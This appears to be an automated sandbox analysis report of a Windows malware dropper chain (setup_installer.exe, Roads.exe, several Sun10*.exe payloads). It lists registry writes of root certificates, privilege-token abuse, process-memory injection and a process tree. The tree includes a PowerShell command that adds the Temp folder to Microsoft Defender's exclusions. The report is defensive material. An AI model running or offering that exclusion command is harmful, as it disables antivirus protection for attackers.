67694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Roads.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Roads.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Roads.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Roads.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun10e4f04359b3ed33c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun10e4f04359b3ed33c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 Roads.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Roads.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 34 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeSun10cb78a30b1eccca7.exeSun10e4f04359b3ed33c.exepid process 2232 powershell.exe 2232 powershell.exe 2848 powershell.exe 2848 powershell.exe 3216 Sun10cb78a30b1eccca7.exe 3216 Sun10cb78a30b1eccca7.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe 2400 Sun10e4f04359b3ed33c.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2688 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
Sun10cb78a30b1eccca7.exearwubatpid process 3216 Sun10cb78a30b1eccca7.exe 2196 arwubat -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sun10f1da220d4c037e1.exeSun10fe8d167a9b78.exeSun1043644c2967579d0.exeSun10e3b1ea69c.exeWerFault.exeSun100b7a261a58b.exepowershell.exepowershell.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeAssignPrimaryTokenPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeLockMemoryPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeIncreaseQuotaPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeMachineAccountPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeTcbPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeSecurityPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeTakeOwnershipPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeLoadDriverPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeSystemProfilePrivilege 316 Sun10f1da220d4c037e1.exe Token: SeSystemtimePrivilege 316 Sun10f1da220d4c037e1.exe Token: SeProfSingleProcessPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeIncBasePriorityPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeCreatePagefilePrivilege 316 Sun10f1da220d4c037e1.exe Token: SeCreatePermanentPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeBackupPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeRestorePrivilege 316 Sun10f1da220d4c037e1.exe Token: SeShutdownPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeDebugPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeAuditPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeSystemEnvironmentPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeChangeNotifyPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeRemoteShutdownPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeUndockPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeSyncAgentPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeEnableDelegationPrivilege 316 Sun10f1da220d4c037e1.exe Token: SeManageVolumePrivilege 316 Sun10f1da220d4c037e1.exe Token: SeImpersonatePrivilege 316 Sun10f1da220d4c037e1.exe Token: SeCreateGlobalPrivilege 316 Sun10f1da220d4c037e1.exe Token: 31 316 Sun10f1da220d4c037e1.exe Token: 32 316 Sun10f1da220d4c037e1.exe Token: 33 316 Sun10f1da220d4c037e1.exe Token: 34 316 Sun10f1da220d4c037e1.exe Token: 35 316 Sun10f1da220d4c037e1.exe Token: SeDebugPrivilege 1332 Sun10fe8d167a9b78.exe Token: SeDebugPrivilege 2728 Sun1043644c2967579d0.exe Token: SeDebugPrivilege 4396 Sun10e3b1ea69c.exe Token: SeRestorePrivilege 2352 WerFault.exe Token: SeBackupPrivilege 2352 WerFault.exe Token: SeDebugPrivilege 3088 Sun100b7a261a58b.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeDebugPrivilege 3552 taskkill.exe Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 Token: SeCreatePagefilePrivilege 2688 Token: SeShutdownPrivilege 2688 -
Suspicious use of FindShellTrayWindow 58 IoCs
Processes:
Tele.exe.pifRoads.exepid process 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 5392 Tele.exe.pif 2688 2688 5392 Tele.exe.pif 5392 Tele.exe.pif 5392 Tele.exe.pif 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 2688 5692 Roads.exe 2688 2688 2688 2688 5692 Roads.exe 2688 2688 2688 2688 5692 Roads.exe 2688 2688 5692 Roads.exe 5692 Roads.exe 5692 Roads.exe 5692 Roads.exe 2688 2688 -
Suspicious use of SendNotifyMessage 14 IoCs
Processes:
Tele.exe.pifRoads.exepid process 2688 2688 2688 5392 Tele.exe.pif 5392 Tele.exe.pif 5392 Tele.exe.pif 5392 Tele.exe.pif 2688 2688 5692 Roads.exe 5692 Roads.exe 5692 Roads.exe 5692 Roads.exe 5692 Roads.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
StartMenuExperienceHost.exepid process 5880 StartMenuExperienceHost.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2688 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4ab87d5532ac629b7a3bc7d8f1471781.exesetup_installer.exesetup_install.execmd.execmd.execmd.exedescription pid process target process PID 2012 wrote to memory of 4792 2012 4ab87d5532ac629b7a3bc7d8f1471781.exe setup_installer.exe PID 2012 wrote to memory of 4792 2012 4ab87d5532ac629b7a3bc7d8f1471781.exe setup_installer.exe PID 2012 wrote to memory of 4792 2012 4ab87d5532ac629b7a3bc7d8f1471781.exe setup_installer.exe PID 4792 wrote to memory of 4652 4792 setup_installer.exe setup_install.exe PID 4792 wrote to memory of 4652 4792 setup_installer.exe setup_install.exe PID 4792 wrote to memory of 4652 4792 setup_installer.exe setup_install.exe PID 4652 wrote to memory of 4876 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4876 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4876 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4836 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4836 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4836 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4916 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4916 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4916 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1340 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1340 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1340 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4320 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4320 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4320 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4656 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4656 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4656 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4644 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4644 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4644 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 3396 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 3396 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 3396 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1376 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1376 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1376 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1388 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1388 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 1388 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4908 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4908 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4908 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4944 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4944 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 4944 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 648 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 648 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 648 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2604 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2604 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2604 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2580 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2580 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2580 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2992 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2992 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2992 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2964 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2964 4652 setup_install.exe cmd.exe PID 4652 wrote to memory of 2964 4652 setup_install.exe cmd.exe PID 2580 wrote to memory of 4396 2580 cmd.exe Sun10e3b1ea69c.exe PID 2580 wrote to memory of 4396 2580 cmd.exe Sun10e3b1ea69c.exe PID 2580 wrote to memory of 4396 2580 cmd.exe Sun10e3b1ea69c.exe PID 2964 wrote to memory of 1752 2964 cmd.exe Sun100a1efe5ce7fc0b.exe PID 2964 wrote to memory of 1752 2964 cmd.exe Sun100a1efe5ce7fc0b.exe PID 2964 wrote to memory of 1752 2964 cmd.exe Sun100a1efe5ce7fc0b.exe PID 1388 wrote to memory of 1796 1388 cmd.exe Sun104c7903af4dec620.exe
Processes
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\4ab87d5532ac629b7a3bc7d8f1471781.exe"C:\Users\Admin\AppData\Local\Temp\4ab87d5532ac629b7a3bc7d8f1471781.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
